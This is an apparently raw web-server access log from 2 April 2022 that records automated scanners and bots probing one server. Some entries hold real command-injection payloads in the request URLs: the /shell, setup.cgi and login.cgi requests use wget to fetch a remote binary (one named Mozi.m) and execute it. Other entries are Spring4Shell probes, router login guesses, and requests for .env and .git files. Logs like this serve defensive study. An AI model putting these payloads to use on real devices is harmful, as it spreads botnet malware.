185.180.143.7 - - [02/Apr/2022:02:15:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.105.15.206 - - [02/Apr/2022:02:18:26 +0200] "POST /?class.module.classLoader.URLs%5B0%5D=0 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
172.105.15.206 - - [02/Apr/2022:02:18:26 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
42.225.207.140 - - [02/Apr/2022:02:18:47 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
1.234.92.45 - - [02/Apr/2022:02:19:12 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
208.115.232.34 - - [02/Apr/2022:02:24:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
128.14.133.58 - - [02/Apr/2022:02:24:29 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
51.222.253.11 - - [02/Apr/2022:02:29:49 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
34.80.35.193 - - [02/Apr/2022:02:37:25 +0200] "CONNECT 146.59.64.13:25562 HTTP/1.1" 405 344 "-" "-"
8.9.231.183 - - [02/Apr/2022:02:40:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
139.162.145.250 - - [02/Apr/2022:02:41:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
59.17.122.19 - - [02/Apr/2022:02:49:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
139.162.145.250 - - [02/Apr/2022:02:52:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
180.252.67.215 - - [02/Apr/2022:02:53:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.161.17.249 - - [02/Apr/2022:02:55:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
197.33.174.153 - - [02/Apr/2022:02:58:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
136.144.41.187 - - [02/Apr/2022:02:59:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.118.53.210 - - [02/Apr/2022:03:00:29 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
103.161.17.249 - - [02/Apr/2022:03:00:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
128.14.134.170 - - [02/Apr/2022:03:02:22 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.71.180.188 - - [02/Apr/2022:03:04:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
36.69.131.57 - - [02/Apr/2022:03:17:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
115.51.94.62 - - [02/Apr/2022:03:22:01 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
128.14.134.134 - - [02/Apr/2022:03:28:25 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.242.56.116 - - [02/Apr/2022:03:30:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.242.56.116 - - [02/Apr/2022:03:30:42 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
20.223.159.160 - - [02/Apr/2022:03:33:26 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Anarchy99"
20.223.159.160 - - [02/Apr/2022:03:33:26 +0200] "POST / HTTP/1.1" 200 1229 "-" "Anarchy99"
34.78.120.99 - - [02/Apr/2022:03:35:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
136.144.41.187 - - [02/Apr/2022:03:38:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
8.9.231.183 - - [02/Apr/2022:03:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
128.199.47.113 - - [02/Apr/2022:03:44:15 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
66.249.70.35 - - [02/Apr/2022:03:45:17 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.35 - - [02/Apr/2022:03:45:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
177.107.33.146 - - [02/Apr/2022:03:45:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
128.1.248.42 - - [02/Apr/2022:03:46:48 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
190.225.17.211 - - [02/Apr/2022:03:49:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
128.199.47.113 - - [02/Apr/2022:03:50:26 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
190.225.17.211 - - [02/Apr/2022:03:51:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
185.169.165.40 - - [02/Apr/2022:03:51:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.118.53.210 - - [02/Apr/2022:03:52:44 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
51.159.103.20 - - [02/Apr/2022:03:57:48 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.68.0"
51.159.103.20 - - [02/Apr/2022:03:57:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.68.0"
35.195.93.98 - - [02/Apr/2022:04:04:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
194.242.56.116 - - [02/Apr/2022:04:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.242.56.116 - - [02/Apr/2022:04:04:50 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
128.14.141.34 - - [02/Apr/2022:04:05:03 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
142.93.34.32 - - [02/Apr/2022:04:11:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
35.195.93.98 - - [02/Apr/2022:04:13:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
167.94.138.120 - - [02/Apr/2022:04:16:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.120 - - [02/Apr/2022:04:16:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.120 - - [02/Apr/2022:04:16:27 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
35.233.62.116 - - [02/Apr/2022:04:20:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
34.140.248.32 - - [02/Apr/2022:04:21:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
162.142.125.211 - - [02/Apr/2022:04:23:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.211 - - [02/Apr/2022:04:23:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.211 - - [02/Apr/2022:04:23:33 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
157.245.70.127 - - [02/Apr/2022:04:26:13 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [02/Apr/2022:04:26:13 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
115.52.13.29 - - [02/Apr/2022:04:26:20 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.52.13.29:58583/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
108.16.7.116 - - [02/Apr/2022:04:28:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.233.62.116 - - [02/Apr/2022:04:28:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
167.248.133.117 - - [02/Apr/2022:04:42:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.117 - - [02/Apr/2022:04:42:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.117 - - [02/Apr/2022:04:42:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:43:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:44:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:48:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:48:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:49:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
198.20.69.98 - - [02/Apr/2022:04:49:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
198.20.69.98 - - [02/Apr/2022:04:49:31 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
198.20.69.98 - - [02/Apr/2022:04:49:32 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
198.20.69.98 - - [02/Apr/2022:04:49:32 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:49:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
198.20.69.98 - - [02/Apr/2022:04:49:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
151.73.4.146 - - [02/Apr/2022:04:49:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
49.7.20.66 - - [02/Apr/2022:04:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
151.73.4.146 - - [02/Apr/2022:04:49:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
34.140.248.32 - - [02/Apr/2022:04:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
151.73.4.146 - - [02/Apr/2022:04:51:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.73.4.146 - - [02/Apr/2022:04:53:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.31.7.206 - - [02/Apr/2022:04:56:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.206 - - [02/Apr/2022:04:56:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
66.57.55.210 - - [02/Apr/2022:04:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.57.55.210 - - [02/Apr/2022:04:58:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://195.133.40.56/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
73.139.139.153 - - [02/Apr/2022:04:58:47 +0200] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "0xAbyssalDoesntExist"
64.31.7.206 - - [02/Apr/2022:04:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
196.77.1.71 - - [02/Apr/2022:05:04:33 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.210.20.60 - - [02/Apr/2022:05:04:34 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
196.77.1.71 - - [02/Apr/2022:05:04:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /nmaplowercheck1648868782 HTTP/1.1" 404 329 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /default.aspx HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 322 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /3piP HTTP/1.1" 404 309 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /base.jsp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /__Additional HTTP/1.1" 404 317 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /.git/HEAD HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /indice.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "POST / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:22 +0200] "GET /pools/default/buckets HTTP/1.1" 404 326 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /default.cgi HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.54.0" li2048-91.members.linode.com - - [02/Apr/2022:05:06:23 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /pools HTTP/1.1" 404 310 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 323 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "POST /functionRouter HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /home.asp HTTP/1.1" 404 313 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 326 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /inicio.cfm HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /menu.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /default.asp HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /readme.txt HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:23 +0200] "GET /admin.shtml HTTP/1.1" 404 316 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:24 +0200] "GET /base.jhtml HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:24 +0200] "GET /inicio.php HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:24 +0200] "GET /menu.html HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:24 +0200] "GET /base.aspx HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:24 +0200] "GET /index.aspx HTTP/1.1" 404 315 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:24 +0200] "GET /menu.pl HTTP/1.1" 404 312 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:25 +0200] "GET /admin.jsp HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:25 +0200] "GET /admin.jsa HTTP/1.1" 404 314 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:25 +0200] "GET default.asp HTTP/1.1" 400 333 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:29 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
172.105.87.91 - - [02/Apr/2022:05:06:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.54.0"
172.105.87.91 - - [02/Apr/2022:05:06:30 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
172.105.87.91 - - [02/Apr/2022:05:06:32 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
172.105.87.91 - - [02/Apr/2022:05:06:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
172.105.87.91 - - [02/Apr/2022:05:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.254.57.132 - - [02/Apr/2022:05:07:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
92.53.64.29 - - [02/Apr/2022:05:08:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
85.202.169.132 - - [02/Apr/2022:05:09:34 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
109.237.103.123 - - [02/Apr/2022:05:09:52 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.31.7.206 - - [02/Apr/2022:05:14:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.160.33 - - [02/Apr/2022:05:15:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
208.115.232.34 - - [02/Apr/2022:05:16:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
85.202.169.132 - - [02/Apr/2022:05:18:35 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
208.115.232.34 - - [02/Apr/2022:05:22:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.9.231.183 - - [02/Apr/2022:05:23:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.206 - - [02/Apr/2022:05:23:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
208.115.232.34 - - [02/Apr/2022:05:26:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
208.115.232.34 - - [02/Apr/2022:05:26:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.9.231.183 - - [02/Apr/2022:05:29:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
157.245.70.127 - - [02/Apr/2022:05:31:07 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [02/Apr/2022:05:31:07 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
206.189.127.6 - - [02/Apr/2022:05:34:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.189.127.6 - - [02/Apr/2022:05:34:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.206 - - [02/Apr/2022:05:35:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.189.127.6 - - [02/Apr/2022:05:36:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
5.166.216.44 - - [02/Apr/2022:05:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
206.189.127.6 - - [02/Apr/2022:05:38:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
208.115.232.34 - - [02/Apr/2022:05:38:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.189.127.6 - - [02/Apr/2022:05:38:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
208.115.232.34 - - [02/Apr/2022:05:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
103.161.17.249 - - [02/Apr/2022:05:39:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
34.77.162.25 - - [02/Apr/2022:05:42:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.31.7.206 - - [02/Apr/2022:05:42:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
208.115.232.34 - - [02/Apr/2022:05:43:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.206 - - [02/Apr/2022:05:44:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.16.39.37 - - [02/Apr/2022:05:45:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
64.31.7.206 - - [02/Apr/2022:05:47:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
208.115.232.34 - - [02/Apr/2022:05:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
39.103.170.113 - - [02/Apr/2022:05:49:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
39.103.170.113 - - [02/Apr/2022:05:50:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
39.103.170.113 - - [02/Apr/2022:05:50:02 +0200] "GET /text4041648871401 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible;)"
39.103.170.113 - - [02/Apr/2022:05:50:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
39.103.170.113 - - [02/Apr/2022:05:50:02 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible;)"
39.103.170.113 - - [02/Apr/2022:05:50:03 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible;)"
39.103.170.113 - - [02/Apr/2022:05:50:04 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible;)"
39.103.170.113 - - [02/Apr/2022:05:50:13 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.103.170.113 - - [02/Apr/2022:05:50:13 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
39.103.170.113 - - [02/Apr/2022:05:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.75.0"
39.103.170.113 - - [02/Apr/2022:05:50:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.75.0"
39.103.170.113 - - [02/Apr/2022:05:50:18 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "curl/7.75.0"
31.210.20.60 - - [02/Apr/2022:05:51:21 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
51.159.103.20 - - [02/Apr/2022:05:54:16 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.68.0"
51.159.103.20 - - [02/Apr/2022:05:54:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.68.0"
8.9.231.183 - - [02/Apr/2022:05:55:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.221 - - [02/Apr/2022:06:03:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.221 - - [02/Apr/2022:06:03:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.221 - - [02/Apr/2022:06:03:17 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
13.38.91.45 - - [02/Apr/2022:06:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
13.38.91.45 - - [02/Apr/2022:06:05:26 +0200] "GET /.git HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
